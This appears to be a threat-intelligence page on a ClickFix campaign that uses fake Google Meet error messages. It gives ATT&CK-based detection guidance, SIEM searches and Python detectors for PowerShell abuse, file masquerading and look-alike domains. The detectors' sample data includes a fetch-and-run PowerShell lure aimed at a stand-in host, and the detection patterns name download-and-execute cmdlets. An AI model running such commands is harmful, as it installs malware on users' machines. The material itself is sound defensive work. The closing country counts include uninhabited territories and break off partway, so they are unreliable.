ClickFix Campaign: Fake Google Meet Alerts Spread Malware Across Windows and macOS


Tags: ClickFix, Fake Google Meet Alerts, Fake Error Messages
Cybercriminals are tricking users with fake Google Meet error messages that prompt them to apply a purported fix or download a file laced with malware. The campaign uses the ClickFix tactic: the lure instructs the victim to copy a command and paste it into a terminal or the Windows Run dialog, so the user, not an exploit, launches the payload. It targets both Windows and macOS users and aims to deploy information-stealing malware. Because the victim runs the command themselves, the technique sidesteps controls that key on exploitation or on attachments and downloads arriving by email; the detections below therefore focus on what the pasted command does once it runs.

Indicators of Compromise

No domains found for this campaign

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION

T1059.001 - Command and Scripting Interpreter: PowerShell

ID | Data Source | Data Component | Detects

DS0017 | Command | Command Execution

PowerShell's execution policy is not a security boundary: an adversary who obtains administrator or SYSTEM access can redefine it through the Registry or at the command line, and any user can override it for a single process with -ExecutionPolicy Bypass. A change to the configured policy on a system is nevertheless one way to detect malicious use of PowerShell. If PowerShell is not used in an environment, simply looking for PowerShell execution may detect malicious activity. It is also beneficial to turn on PowerShell logging (module, script block and transcription logging) to gain increased fidelity in what occurs during execution, including .NET invocations. [273] PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.[274] Gather PowerShell execution details in a data analytic platform so they can be correlated with other data.

PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe. For this to work, certain registry keys must be set and the WinRM service must be enabled. The PowerShell command Enter-PSSession -ComputerName <RemoteHost> creates a remote PowerShell session.

DS0011 | Module | Module Load

Monitor for loading and/or execution of artifacts associated with PowerShell-specific assemblies, such as System.Management.Automation.dll, especially into unusual process names or locations.[3][4] This catches PowerShell hosted outside powershell.exe and pwsh.exe (any .NET process that loads the automation engine), which analytics keyed on the process name will miss. Baseline the legitimate hosts (powershell.exe, pwsh.exe, powershell_ise.exe, management agents) and alert on the rest. In Sysmon Event ID 7 the loaded module path is recorded in ImageLoaded and its version-resource description in Description.

Analytic 1 - Processes loading PowerShell assemblies

source="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="7" | where ImageLoaded LIKE "%System.Management.Automation%" OR Description LIKE "%System.Management.Automation%"

DS0009 | Process | Process Creation

Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution. PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Script execution is largely opaque to file-based antivirus, which makes PowerShell an easy way to circumvent security controls. The analytics below detect PowerShell process creation.

PowerShell can also be used to wrap command-line activity that is otherwise monitored, for example:

net use
sc start

Notes:
- Analytic 1 detects non-interactive PowerShell sessions (those not launched by a user through explorer.exe). This may lead to false positives in a production environment, so tune it with additional logic (e.g., suspicious parent processes). For ClickFix specifically the parent-process exclusion works against you: a command pasted into the Win+R Run dialog is launched by explorer.exe, and one pasted into a console is launched by cmd.exe or WindowsTerminal.exe, while a paste into an already-open PowerShell window creates no new process at all. Alert on the command-line content (hidden window, bypassed execution policy, encoded or web-fetched payload) regardless of parent, and pair process creation with script block logging (see Script Execution below).
- Analytic 2 detects remote PowerShell sessions. PowerShell can be used over WinRM to remotely run commands on a host; when a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe.
- Security Event ID 4688 records the process as NewProcessName and its parent as ParentProcessName; Image and ParentImage are Sysmon's names and contain the full path, so match on a trailing wildcard. PowerShell 7 runs as pwsh.exe and should be matched alongside powershell.exe.

Analytic 1 - Non-interactive PowerShell Sessions

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688")) AND (Image="*\powershell.exe" OR Image="*\pwsh.exe") AND ParentImage!="*\explorer.exe"

Analytic 2 - Remote PowerShell Sessions

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688")) AND Image="*\wsmprovhost.exe" AND ParentImage="*\svchost.exe"

Analytic 3 - PowerShell Execution

(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") Image="C:\Windows\*\powershell.exe" ParentImage!="C:\Windows\explorer.exe" | stats values(CommandLine) as "Command Lines" values(ParentImage) as "Parent Images" by ComputerName



DS0009 | Process | Process Metadata

Consider monitoring for Windows event ID (EID) 400 in the classic Windows PowerShell log, which shows the version of PowerShell executing in the EngineVersion field (relevant to detecting a potential Downgrade Attack to PowerShell 2.0, which lacks script block logging) as well as whether PowerShell is running locally or remotely in the HostName field. EID 400 indicates the start time and EID 403 the end time of a PowerShell session.[275]

DS0012 | Script | Script Execution

Any attempt to enable script execution on a system should be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Note: Event ID 4104 (Microsoft-Windows-PowerShell/Operational, script block logging) records the script content in ScriptBlockText, not the process command line. Switches such as -enc, -ep bypass or -noni are therefore found in process-creation events (Sysmon Event ID 1 or Security 4688), while 4104 shows what the command ultimately ran, even when it arrived base64-encoded or was pasted into an already-open console where no new process is created. Field wildcards in these searches use *, so a bare value such as "-enc" would only match an exact field value.

Analytic 1 - Script Block Logging Events

(source=WinEventLog:"Microsoft-Windows-PowerShell/Operational" EventID="4104") AND (ScriptBlockText="*Invoke-Expression*" OR ScriptBlockText="*iex *" OR ScriptBlockText="*iex(*" OR ScriptBlockText="*Invoke-RestMethod*" OR ScriptBlockText="*irm *" OR ScriptBlockText="*DownloadString*" OR ScriptBlockText="*FromBase64String*")

Analytic 2 - Suspicious PowerShell Switches at Process Creation

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688")) AND (Image="*\powershell.exe" OR Image="*\pwsh.exe") AND (CommandLine="*-enc*" OR CommandLine="*-ep bypass*" OR CommandLine="*-noni*" OR CommandLine="*-w hidden*")
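The Process Creation and Script Execution analytics above are written as SIEM searches. The Python below, added here as an example and not code from the original page or from the campaign's authors, applies the same logic to a handful of constructed Sysmon Event ID 1, Security 4688 and PowerShell 4104 records: it decodes -EncodedCommand payloads (base64 over UTF-16LE) before matching, maps the differing Sysmon and 4688 field names, and records an explorer.exe parent as context rather than using it as an exclusion, since a ClickFix command pasted into the Win+R dialog is launched by explorer.exe. The sample records, the lure URL under the reserved .example domain, the switch patterns and the alert threshold of two indicators are all assumptions.

```python
"""ClickFix-style PowerShell triage over process-creation and script-block events.

Added example, not code from the original page. The records, lure URL
(reserved .example TLD), switch patterns and alert threshold are assumptions.
"""
import base64
import re
from typing import Optional

PS_IMAGES = ("powershell.exe", "pwsh.exe")
ALERT_THRESHOLD = 2  # assumed: require two independent indicators before alerting

# Command-line switches that ClickFix lures typically chain together (assumed patterns).
FLAG_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:x(?:ecutionpolicy)?|p)\s+bypass\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
}
# Content patterns, applied to the command line, the decoded -EncodedCommand
# payload and EID 4104 ScriptBlockText alike.
CONTENT_PATTERNS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_fetch": re.compile(
        r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 over UTF-16LE text; None if the blob is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument; used here only to construct sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_record(rec: dict) -> dict:
    """Score one event; returns score, matched indicators, decoded payload and context."""
    empty = {"score": 0, "findings": [], "decoded": None, "context": ""}
    findings, decoded, context = [], None, ""
    event_id = int(rec.get("EventID", rec.get("EventCode", 0)))
    if event_id in (1, 4688):
        # Sysmon names the fields Image/ParentImage; Security 4688 uses
        # NewProcessName/ParentProcessName. Both carry CommandLine.
        image = rec.get("Image") or rec.get("NewProcessName", "")
        parent = rec.get("ParentImage") or rec.get("ParentProcessName", "")
        if _basename(image) not in PS_IMAGES:
            return empty
        cmdline = rec.get("CommandLine", "")
        for name, pat in FLAG_PATTERNS.items():
            m = pat.search(cmdline)
            if m:
                findings.append(name)
                if name == "encoded_command":
                    decoded = decode_encoded_command(m.group(1))
        # Drop the base64 blob before content matching so its letters cannot
        # trigger a pattern by chance; the decoded payload is matched instead.
        text = FLAG_PATTERNS["encoded_command"].sub(" ", cmdline) + " " + (decoded or "")
        # A command pasted into the Win+R Run dialog is launched by explorer.exe,
        # so the parent is recorded as context rather than used as an exclusion.
        if _basename(parent) == "explorer.exe":
            context = "launched from explorer.exe (Run dialog or shell)"
    elif event_id == 4104:
        text = rec.get("ScriptBlockText", "")
    else:
        return empty
    for name, pat in CONTENT_PATTERNS.items():
        if pat.search(text):
            findings.append(name)
    return {"score": len(findings), "findings": findings, "decoded": decoded, "context": context}


def triage(records: list) -> list:
    """Return (index, result) for every record at or above ALERT_THRESHOLD."""
    hits = []
    for i, rec in enumerate(records):
        result = score_record(rec)
        if result["score"] >= ALERT_THRESHOLD:
            hits.append((i, result))
    return hits


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LURE = "iex (irm https://meet-fix.example/fix)"  # constructed, not a real lure

# Constructed sample telemetry, not captured data.
SAMPLE_RECORDS = [
    {"EventID": 1, "Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "' + LURE + '"'},
    {"EventID": 1, "Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -noni -w hidden -enc " + encode_ps(LURE)},
    {"EventID": 4688, "NewProcessName": PS_EXE, "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"EventID": 4104, "ScriptBlockText":
        "$r = Invoke-RestMethod 'https://meet-fix.example/fix'; Invoke-Expression $r"},
    {"EventID": 4104, "ScriptBlockText": "Get-Service | Where-Object Status -eq Running"},
]

if __name__ == "__main__":
    for i, r in triage(SAMPLE_RECORDS):
        print(f"record {i}: score={r['score']} findings={r['findings']} {r['context']}")
        if r["decoded"]:
            print(f"  decoded payload: {r['decoded']}")
```

Run it and the two Run-dialog invocations and the 4104 script block are reported while the signed inventory script is not; the encoded variant is caught only because the payload is decoded before matching. Raise ALERT_THRESHOLD or add parent-process context to the score once you have baselined your own administrators' usage.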


T1036 - Masquerading

ID | Data Source | Data Component | Detects

DS0017 | Command | Command Execution

Monitor executed commands and arguments that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. [52]

Note: For Windows, Event ID 4104 (from the Microsoft-Windows-PowerShell/Operational log) captures PowerShell script blocks, which can be analyzed to detect potential Masquerading.

DS0022 | File | File Metadata

Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override character ("\u202E", "[U+202E]" and "%E2%80%AE" are the same code point written as an escape sequence, as a code point label and as percent-encoded UTF-8).

Check and ensure that file headers/signatures and extensions match using magic-byte detection and/or file signature validation.[53] On Linux and macOS, the file command may be used to check the file signature.[54]
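As an added example (not code from the original page), the following Python performs the file-name and magic-byte checks described above on constructed sample names and byte strings. It flags Unicode bidi-override characters and shows what the name renders as, trailing spaces, document-then-executable double extensions, and a stored extension that disagrees with the file's leading bytes. The signature table covers only a few common types, and the executable and document extension lists are assumptions.

```python
"""File-name and magic-byte masquerading checks.

Added example, not code from the original page. Extension lists, the
signature table and all sample names/bytes are constructed for illustration.
"""
import re

RLO = "\u202e"
# Unicode bidi controls: LRE, RLE, PDF, LRO, RLO, LRI, RLI, FSI, PDI.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe",
                   "wsf", "hta", "ps1", "lnk", "msi", "dll", "cpl"}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt",
                 "jpg", "jpeg", "png", "mp4", "ics"}
# (leading bytes, type name, extensions that legitimately carry this content)
MAGIC = [
    (b"MZ", "pe", {"exe", "dll", "scr", "sys", "cpl", "ocx"}),
    (b"%PDF", "pdf", {"pdf"}),
    (b"PK\x03\x04", "zip", {"zip", "docx", "xlsx", "pptx", "jar", "apk"}),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole", {"doc", "xls", "ppt", "msi"}),
    (b"\xcf\xfa\xed\xfe", "macho", {"", "dylib", "bundle"}),
    (b"\xca\xfe\xba\xbe", "macho-fat", {"", "dylib", "bundle"}),
    (b"\x7fELF", "elf", {"", "so"}),
]


def identify(data: bytes):
    """Return (type name, allowed extensions) from the leading bytes, or (None, set())."""
    for magic, kind, exts in MAGIC:
        if data.startswith(magic):
            return kind, exts
    return None, set()


def displayed_name(name: str) -> str:
    """Approximate what a bidi-aware UI shows: text after the first U+202E is
    drawn right-to-left. This is a simplification of the full bidi algorithm."""
    if RLO not in name:
        return name
    head, tail = name.split(RLO, 1)
    return head + tail[::-1]


def extension(name: str) -> str:
    """Real extension of the file as stored; Windows drops trailing spaces and dots."""
    base = name.rstrip(" .")
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def inspect_filename(name: str) -> list:
    findings = []
    if any(ch in BIDI_CONTROLS for ch in name):
        findings.append(f"bidi_override: renders as {displayed_name(name)!r}")
    if name != name.rstrip(" "):
        findings.append("trailing_space")
    parts = name.rstrip(" ").lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTS and parts[-2] in DOCUMENT_EXTS:
        findings.append(f"double_extension: .{parts[-2]}.{parts[-1]}")
    if re.search(r" {4,}\.\w+$", name):  # e.g. "invoice.pdf            .exe"
        findings.append("padded_extension")
    return findings


def inspect_content(name: str, data: bytes) -> list:
    """Flag a stored extension that disagrees with the file's leading bytes."""
    kind, exts = identify(data)
    if kind is None:
        return []
    ext = extension(name)
    if ext not in exts:
        return [f"extension_mismatch: named .{ext or '(none)'} but content is {kind}"]
    return []


def inspect(name: str, data: bytes) -> list:
    return inspect_filename(name) + inspect_content(name, data)


# Constructed samples: a DOS-header stub and a PDF header, not real files.
PE_STUB = b"MZ\x90\x00" + b"\x00" * 60
PDF_STUB = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"
SAMPLES = [
    ("Meet_Invite\u202efdp.exe", PE_STUB),   # shown to the user as Meet_Inviteexe.pdf
    ("agenda.pdf.scr", PE_STUB),
    ("meeting-notes.pdf", PE_STUB),
    ("meeting-notes.pdf", PDF_STUB),
    ("GoogleMeetFix.exe ", PE_STUB),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(f"{name!r}: {inspect(name, data) or 'clean'}")
```

Note that the RLO sample is not an extension mismatch: the stored extension really is .exe and the content really is a PE image, so only the name check catches it. Conversely the renamed PE that claims to be a PDF has a perfectly ordinary name and is caught only by the magic-byte check, which is why both checks are needed.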



DS0022 | File | File Modification

Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Windows Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on attempted file accesses that may be associated with Masquerading.

DS0007 | Image | Image Metadata

Collecting disk and resource filenames for binaries, comparing that the InternalName, OriginalFilename, and/or ProductName match what is expected, could provide useful leads but may not always be indicative of malicious activity. [55]

DS0009 | Process | OS API Execution

Monitor for API calls such as fork() which can be abused to masquerade or manipulate process metadata.



DS0009 | Process | Process Creation

Monitor for newly executed processes that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. The RECYCLER and SystemVolumeInformation directories will be present on every drive. Replace %systemroot% and %windir% with the actual paths as configured on the endpoints.

Analytic 1 - Suspicious Run Locations

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688")) AND (Image="*:\RECYCLER\*" OR Image="*:\SystemVolumeInformation\*" OR Image="%windir%\Tasks\*" OR Image="%systemroot%\debug\*")



DS0009 | Process | Process Metadata

Monitor for file names that differ from the name recorded in the binary's PE metadata (OriginalFilename); a mismatch is a likely indicator that the binary was renamed after it was compiled.

DS0003 | Scheduled Job | Scheduled Job Metadata

Monitor for contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.

On Windows, Event ID 4698 (Security Log - A scheduled task was created) can be used to alert on the creation of scheduled tasks and provides metadata including the task name and task content (as XML).

On Linux, auditing frameworks such as the Linux Auditing System (auditd) can be used to alert on invocations of cron, and provides the metadata included when executing the command.



DS0003 | Scheduled Job | Scheduled Job Modification

Monitor for changes made to scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.

DS0019 | Service | Service Creation

Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.



DS0019 | Service | Service Metadata

Monitor for contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.


T1566.002 - Spearphishing Link

ID | Data Source | Data Component | Detects

DS0015 | Application Log | Application Log Content

Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[124][125] URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can help detect links leading to known malicious sites.[2] Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.

Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).

DS0029 | Network Traffic | Network Traffic Content

Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Furthermore, monitor network traffic for cloned sites as well as homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).
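The homograph checks mentioned under Application Log Content and here under Network Traffic Content can be applied to hostnames extracted from browser or proxy logs. The Python below, added as an example and not part of the original page, decodes xn-- labels to Unicode, reports labels that mix scripts (for example Cyrillic letters inside an otherwise Latin name) and folds common ASCII and Cyrillic look-alikes before comparing against a watch-list of protected domains. The watch-list, the confusable tables and the sample hostnames are constructed for illustration.

```python
"""Homograph and look-alike checks for hostnames pulled from browser or proxy logs.

Added example, not code from the original page. The watch-list, confusable
tables and sample hostnames are constructed for illustration.
"""
import unicodedata

PROTECTED = sorted({"google.com", "meet.google.com", "microsoft.com"})  # assumed watch-list

# Multi-character and digit look-alikes in plain ASCII (applied in order).
ASCII_CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"), ("3", "e")]
# Cyrillic lowercase letters whose glyphs match Latin ones.
CYRILLIC_TO_LATIN = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
})


def to_unicode(host: str) -> str:
    """Decode punycode (xn--) labels to their Unicode form; other labels pass through."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            label = label.encode("ascii").decode("idna")
        labels.append(label)
    return ".".join(labels)


def scripts(label: str) -> set:
    """Unicode scripts used by the letters of a label, taken from the character names."""
    found = set()
    for ch in label:
        if ch.isalpha():
            found.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])  # LATIN, CYRILLIC, GREEK...
    return found


def mixed_script(host: str) -> bool:
    """True if any label mixes scripts, the classic IDN homograph pattern."""
    return any(len(scripts(label)) > 1 for label in to_unicode(host).split("."))


def skeleton(host: str) -> str:
    """Fold look-alikes so 'rnicrosoft' and Cyrillic 'gооgle' compare equal to their targets."""
    s = to_unicode(host).translate(CYRILLIC_TO_LATIN)
    for pair, target in ASCII_CONFUSABLES:
        s = s.replace(pair, target)
    return s


def assess(host: str) -> list:
    findings = []
    uni = to_unicode(host)
    if uni != host.lower():
        findings.append(f"idn: {host} -> {uni}")  # informational; many IDNs are legitimate
    if mixed_script(host):
        findings.append("mixed_script")
    sk = skeleton(host)
    for target in PROTECTED:
        if uni == target or uni.endswith("." + target):
            continue  # the real domain or one of its own subdomains
        tsk = skeleton(target)
        if sk == tsk or sk.endswith("." + tsk):
            findings.append(f"lookalike_of: {target}")
    return findings


# Constructed samples; the first is "google.com" with two Cyrillic o's, stored
# the way a proxy log would record it (punycode).
SAMPLE_HOSTS = [
    "g\u043e\u043egle.com".encode("idna").decode("ascii"),
    "rnicrosoft.com",
    "accounts.google.com",
    "meet.google.com",
]

if __name__ == "__main__":
    for host in SAMPLE_HOSTS:
        print(f"{host}: {assess(host) or 'clean'}")
```

The skeleton comparison is deliberately crude; for production use, replace the two small tables with the full Unicode confusables data and keep the subdomain exemption, since legitimate hosts such as accounts.google.com must not be reported as look-alikes of their own parent domain.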



DS0029 | Network Traffic | Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1566.001 - Spearphishing Attachment

ID | Data Source | Data Component | Detects

DS0015 | Application Log | Application Log Content

Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[255][256] Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.[257]

DS0022 | File | File Creation

Monitor for newly constructed files written by spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

DS0029 | Network Traffic | Network Traffic Content

Monitor and analyze SSL/TLS traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments associated with traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)). Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.[255][256]



DS0029 | Network Traffic | Network Traffic Flow

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.


T1189 - Drive-by Compromise

ID | Data Source | Data Component | Detects

DS0015 | Application Log | Application Log Content

Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.

DS0022 | File | File Creation

Monitor for newly constructed files written to disk by a browser or its helper processes, which may indicate an attempt to gain access to a system through a user visiting a website in the normal course of browsing.

DS0029 | Network Traffic | Network Connection Creation

Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data.



DS0029 | Network Traffic | Network Traffic Content

Monitor for other unusual network traffic that may indicate additional tools transferred to the system. Use network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.

DS0009 | Process | Process Creation

Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, or evidence of Discovery.


T1204 - User Execution

ID | Data Source | Data Component | Detects

DS0015 | Application Log | Application Log Content

Monitor for third-party application logging, messaging, and/or other artifacts that may rely upon specific actions by a user in order to gain execution.

DS0017 | Command | Command Execution

Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.

DS0032 | Container | Container Creation

Monitor for newly constructed containers, in particular those a user creates from an image that did not come from an approved registry, since running a malicious image is a form of user execution.



DS0032 | Container | Container Start

Monitor for the activation or invocation of a container (ex: docker start or docker restart)

DS0022 | File | File Creation

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

DS0007 | Image | Image Creation

Monitor for newly built or pulled images that a user may run; an image from an unapproved registry or with an unexpected entrypoint is suspect.

DS0030 | Instance | Instance Creation

Monitor for newly constructed cloud instances that a user launches from an untrusted machine image or template.



DS0030 | Instance | Instance Start

Monitor for the activation or invocation of an instance (ex: instance.start within GCP Audit Logs)

DS0029 | Network Traffic | Network Connection Creation

Monitor for newly constructed web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections, or unusual connections initiated by regsvr32.exe, rundll32.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).



DS0029 | Network Traffic | Network Traffic Content

Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections, or unusual connections initiated by regsvr32.exe, rundll32.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).

DS0009 | Process | Process Creation

Monitor for newly executed processes that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.


T1059.005 - Command and Scripting Interpreter: Visual Basic

ID | Data Source | Data Component | Detects

DS0017 | Command | Command Execution

Monitor executed commands and arguments that may abuse Visual Basic (VB) for execution.

DS0011 | Module | Module Load

Monitor for the loading of modules associated with VB languages (ex: vbscript.dll).

Note: For Windows, Sysmon Event ID 7 (Image loaded) can be used to alert on the loading of DLL modules (e.g., vbscript.dll) associated with Visual Basic into processes. Due to the high frequency of image load operations, Event ID 7 can generate a large volume of events. Therefore, we recommend tuning the Sysmon configuration file to exclude common, benign image loads that may result in false positives.

DS0009 | Process | Process Creation

Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.

DS0012 | Script | Script Execution

Any attempt to enable script execution on a system should be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Note: Be aware of VBScript execution from temporary or unusual file locations, which may indicate malicious activity. VBScript runs under the Windows Script Host (wscript.exe or cscript.exe), so the relevant telemetry is process creation (Sysmon Event ID 1 or Security 4688) rather than the PowerShell module-logging event 4103, and .vba is a Visual Basic for Applications module export rather than a file the script host runs.

Analytic 1 - Script Execution from Temporary Locations

((source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="1") OR (source="WinEventLog:Security" EventCode="4688")) AND (Image="*\wscript.exe" OR Image="*\cscript.exe") AND (CommandLine="*\AppData\*.vbs*" OR CommandLine="*\AppData\*.vbe*" OR CommandLine="*\Temp\*.vbs*" OR CommandLine="*\Temp\*.vbe*")

Observed Countries (250)

AD (852)
AE (847)
AF (241)
AG (673)
AI (373)
AL (855)
AM (797)
AO (579)
AQ (695)
AR (91)
AS (860)
AT (82)
AU (570)
AW (698)
AX (978)
AZ (562)
BA (944)
BB (423)
BD (705)
BE (49)
BF (705)
BG (683)
BH (261)
BI (7)
BJ (797)
BL (164)
BM (927)
BN (733)
BO (850)
BQ (338)
BR (620)
BS (793)
BT (173)
BV (6)
BW (854)
BY (577)
BZ (637)
CA (998)
CC (461)
CD (139)
CF (301)
CG (416)
CH (82)
CI (679)
CK (933)
CL (618)
CM (128)
CN (631)
CO (725)
CR (799)
CU (130)
CV (559)
CW (784)
CX (533)
CY (463)
CZ (501)
DE (479)
DJ (961)
DK (497)
DM (772)
DO (308)
DZ (753)
EC (268)
EE (573)
EG (47)
EH (795)
ER (531)
ES (81)
ET (801)
FI (478)
FJ (398)
FK (903)
FM (363)
FO (496)
FR (188)
GA (372)
GB (620)
GD (221)
GE (855)
GF (706)
GG (486)
GH (410)
GI (3)
GL (140)
GM (448)
GN (957)
GP (876)
GQ (157)
GR (484)
GS (72)
GT (369)
GU (801)
GW (755)
GY (587)
HK (249)
HM (246)
HN (586)
HR (651)
HT (606)
HU (393)
ID (825)
IE (935)
IL (580)
IM (119)
IN (497)
IO (871)
IQ (868)
IR (9)
IS (858)
IT (564)
JE (456)
JM (96)
JO (774)
JP (356)
KE (536)
KG (250)
KH (7)
KI (25)
KM (649)
KN (770)
KP (646)
KR (348)
KW (178)
KY (218)
KZ (213)
LA (972)
LB (992)
LC (94)
LI (907)
LK (753)
LR (944)
LS (722)
LT (144)
LU (105)
LV (561)
LY (273)
MA (222)
MC (917)
MD (933)
ME (883)
MF (212)
MG (433)
